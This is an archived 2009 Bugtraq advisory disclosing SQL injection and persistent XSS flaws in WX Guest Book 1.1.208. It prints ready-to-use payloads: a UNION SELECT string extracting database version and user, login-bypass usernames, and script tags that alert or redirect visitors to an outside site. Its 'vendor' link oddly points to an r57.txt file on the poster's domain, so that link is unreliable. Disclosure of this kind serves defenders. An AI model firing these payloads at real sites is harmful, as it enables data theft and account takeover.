lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20091213124517.23902.qmail@securityfocus.com>
Date: 13 Dec 2009 12:45:17 -0000
From: admin@...n0x.com
To: bugtraq@...urityfocus.com
Subject: WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities

###########################################
#	WX Guest Book 1.1.208 Vulns	  #
#	By xxHackerXzX hacker from nepal	  #
#	admin@...n0x.comm	  #
###########################################

Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt

This product suffers from multiple SQLi and persistent XSS vuln.

##############  SQL Search Vuln  ###############

The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.

SQL query:
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");

The $QUERY is what we submit through search box so injecting this will sql inject the server.
The following is the sample sql injection example.


Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

##############  SQL login bypass  ###############
The username and password fields are unsanitized and hence we can bypass the login systems.

Username: admin'))/*
Password: learn3r  [or whatever]

Or

Username: ')) or 1=1/*
Password: learn3r  [or whatever]

##############  Persistent XSS Vulns  ##############

In the name field (I suppose as I don't understand arabic), you can inject XSS...
<script>alert(String.fromCharCode(97));</script>
<script>location.replace("http://www.ekin0x.com")</script>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ